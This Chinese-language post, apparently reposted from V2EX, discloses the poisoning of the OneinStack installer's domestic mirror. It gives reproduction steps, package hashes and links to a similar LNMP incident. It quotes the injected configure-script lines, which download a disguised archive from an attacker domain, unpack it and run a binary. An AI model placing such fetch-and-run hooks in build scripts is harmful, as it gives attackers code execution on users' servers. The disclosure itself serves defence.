继五月份被投毒后，OneinStack一键安装包再遭投毒，有趣的是恶意域名与LNMP一键安装包被投毒恶意域名注册时间为同一天。

如何复现

（从海外节点下载暂未发现有此问题）

mirrors.oneinstack.com CNAME 到 seo-one-01.xnsksstack.com，这个域名 DNS 为 DNSPod ，国内解析为 CNAME mirrors.oneinstack.com.w.cdngslb.com. 阿里云 CDN（含恶意代码），海外解析为 A 47.251.13.6 阿里云美国节点

# 国内机器或手动指定 mirrors.oneinstack.com.w.cdngslb.com 国内 IP

wget http://mirrors.oneinstack.com/oneinstack-full.tar.gz
tar -xzf oneinstack-full.tar.gz
cd oneinstack/src
tar -xzf pcre-8.45.tar.gz
cd pcre-8.45
grep -r "oneinstack.club" pcre-8.45

结果（pcre-8.45/configure 第 6883 行）：

pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg

验证 MD5：

# 恶意包
md5sum oneinstack-full.tar.gz
3dc788dd9fe0c13e3db1411e53932331  oneinstack-full.tar.gz

#海外节点包（暂未发现有此问题）
aa55626f6ba9eb8cae2f5a3d9c6c9b96  oneinstack-full.tar.gz

国内国外包对比（上边国内下边海外）： 

root@Huangxins-PC:~/oneinstack/src# grep -r '/var/local/' ~/oneinstack/
/root/oneinstack/src/pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg
/root/oneinstack/src/pcre-8.45/configure:tar zxf /var/local/osk.jpg -C /var/local/ > /dev/null
/root/oneinstack/src/pcre-8.45/configure:rm -f /var/local/osk.jpg
/root/oneinstack/src/pcre-8.45/configure:/var/local/cron/load linhkkngf@QWE

和 lnmp.org 和半年前的 Oneinstack 挂马（GitHub）一样。

https://github.com/oneinstack/oneinstack/issues/487

恶意域名 oneinstack.club 注册于 2023-08-28，和 lnmp 的恶意域名 lnmp.life 注册日期、注册商均一致。

本文引用至：https://v2ex.com/t/979226